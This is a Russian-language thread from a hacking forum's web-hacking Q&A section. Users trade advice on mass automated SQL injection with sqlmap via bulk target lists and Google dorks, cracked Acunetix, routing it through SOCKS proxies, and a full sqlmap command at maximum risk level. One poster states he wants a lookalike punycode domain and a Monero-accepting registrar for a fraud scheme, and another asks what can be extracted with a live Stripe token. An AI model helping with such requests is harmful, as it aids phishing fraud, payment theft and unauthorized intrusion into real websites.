• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Отслеживать
Насколько актуальны punycodes сегодня? Действительно ли он работает? Есть ли надежный регистратор? Если да, то укажите, пожалуйста. Любую актуальную информацию я очень ценю.
 
gnida0 сказал(а):
А есть ли смысл выше обновляться? Новые фичи не добавляются, сканнером не пользуюсь
Сложный вопрос, у меня больше какое-то подсознательное желание иметь максимально свежие версии. Фичи добавляют, но сложно сказать как часто. Например, не так давно появился сканер API. после твоего вопроса, полез ради интереса смотреть, что там в обновлениях с версий 2023...

Браузер регулярно обновляют, периодически правят ошибки из-за которых падала производительность, что-то подвисало или переставало обновляться. Новые виды сканирования добавляют, например, пассивный скан CSP. Иногда в чейндж логах проскакивает что-то типа "исправили ошибку, которая не давала просканировать ряд возможных ендпоинтов апи". Ну это я так... поверхностно.

Читая историю изменений, пришел к выводу, что надо хранить две версии: старенькую и новеньку. Потому как, например, бывает такое: "Мы удалили поддержку внешней базы данных MySQL версии 5.7. В настоящее время мы поддерживаем версию 8.3.0 и любые версии, поддерживаемые MySQL.". Самое забавное, что я мапой пару недель назад работал с крупным сайтом на котором вообще не 5.7 версия мускуля стоит. Им до 5.7 еще обновляться и обновляться.
 
i0pht сказал(а):
Насколько актуальны punycodes сегодня? Действительно ли он работает? Есть ли надежный регистратор? Если да, то укажите, пожалуйста. Любую актуальную информацию я очень ценю.
Можно как-то перефразировать вопрос? А то я что-то в ступор аж впал. Есть какая-то фишка с punycode? Или что?
Просто непонятно, что значит "работает"? Ради интереса набрал в google "site:.рф", открылся сайт с на кириллице написанным урлом. Закинул в конвертер, получил punycode, вставил в браузер и открылся тот же сайт.
 
petrinh1988 сказал(а):
Сложный вопрос, у меня больше какое-то подсознательное желание иметь максимально свежие версии. Фичи добавляют, но сложно сказать как часто. Например, не так давно появился сканер API. после твоего вопроса, полез ради интереса смотреть, что там в обновлениях с версий 2023...

Браузер регулярно обновляют, периодически правят ошибки из-за которых падала производительность, что-то подвисало или переставало обновляться. Новые виды сканирования добавляют, например, пассивный скан CSP. Иногда в чейндж логах проскакивает что-то типа "исправили ошибку, которая не давала просканировать ряд возможных ендпоинтов апи". Ну это я так... поверхностно.

Читая историю изменений, пришел к выводу, что надо хранить две версии: старенькую и новеньку. Потому как, например, бывает такое: "Мы удалили поддержку внешней базы данных MySQL версии 5.7. В настоящее время мы поддерживаем версию 8.3.0 и любые версии, поддерживаемые MySQL.". Самое забавное, что я мапой пару недель назад работал с крупным сайтом на котором вообще не 5.7 версия мускуля стоит. Им до 5.7 еще обновляться и обновляться.
если ты про сканнер sqlmap через апи, то он и был в дополнительных модулях
 
Focus17 сказал(а):
нет. заряжаешь линки массово, указыввешь вюлну, и сливаешь на автомате
Я gnida0 отвечал... )

Но раз зашел разговор... у sqlmap же есть режимы массового сканирвоания:
-m BULKFILE Scan multiple targets given in a textual file
-g GOOGLEDORK Process Google dork results as target URLs

Или Acunetix. На форуме выложены ссылки на крякнутый.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Focus17 сказал(а):
как проксифицировать окунь? окунь от pwners не дает воткнуть сокс из-за лицухи. что делать с задроч ип?
Как варик под винду всегда есть Proxifier.
 
Focus17 сказал(а):
как проксифицировать окунь? окунь от pwners не дает воткнуть сокс из-за лицухи. что делать с задроч ип?
https://xss.pro/threads/106490/post-742297 / https://xss.pro/threads/14482/post-767294
 
petrinh1988 сказал(а):
Можно как-то перефразировать вопрос? А то я что-то в ступор аж впал. Есть какая-то фишка с punycode? Или что?
Просто непонятно, что значит "работает"? Ради интереса набрал в google "site:.рф", открылся сайт с на кириллице написанным урлом. Закинул в конвертер, получил punycode, вставил в браузер и открылся тот же сайт.
Я хотел зарегистрировать домен типа look like и у меня возникла идея использовать punycode, так как он преобразует неанглоязычные символы в серию букв, которые обозначают неанглоязычный символ, и как эффективно работать с punycode доменами, его плюсы, минусы и советы (если они есть).

Есть ли регистратор, который предлагает зарегистрировать домен с поникодом, а также принимает XMR и не блокирует его, так как я хотел использовать его для мошеннической схемы.
 
Focus17 сказал(а):
Правильно составлена команда?

Посмотреть вложение 84459
Посмотреть вложение 84460

sqlmap -u "https://example.com/people/?*" -p first_letter --dbs --dbms=MySQL --risk=3 --level=5 --random-agent -v3
sqlmap.py -r "полный_путь_к_файлу_с_запросом.txt" --dbs --dbms=MySQL --risk=3 --level=5 -v3
В файле с запросом следующее:
HTTP: 
POST https://example.com/people/?first_letter=B* HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
User-Agent: тут юзер агент хрома, такой же как в сканнере

_wp_http_referer=...... < тут полностью тело запроса как на скрине.
P.S. Судя по кукам, которые передает в запросе сканнер, он на таргете зарегался под логином "lxbfYeaa", поэтому возможно тебе надо будет авторизоваться на таргете и в запрос добавить куки.
 
[16:53:51] [INFO] testing connection to the target URL
[16:54:21] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLS_CLIENT' ('TimeoutError: timed out')
[16:54:51] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_2' ('TimeoutError: timed out')
[16:55:21] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_1' ('TimeoutError: timed out')
[16:55:51] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1' ('TimeoutError: timed out')
[16:55:51] [CRITICAL] can't establish SSL connection

как решить?
 
Где можно почитать об актуальных уязвимостях в приложениях PHP? Да и просто уязвимостях WEB приложений. Мне бы топ некий, способ воспроизведения, способ починки. Мб подскажите ресурсы?
 
Какие ценные данные можно извлечь через live-токен stripe?

apxntektop сказал(а):
Где можно почитать об актуальных уязвимостях в приложениях PHP? Да и просто уязвимостях WEB приложений. Мне бы топ некий, способ воспроизведения, способ починки. Мб подскажите ресурсы?
OWASP Top 10 2024 в Google набери, будет тебе самый актуальный топ по web-уязвимостям
 
c0d3x сказал(а):
https://xss.pro/threads/106490/post-742297 / https://xss.pro/threads/14482/post-767294
возможно ли как-то запустить весь окунь с соксом, proxychains?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх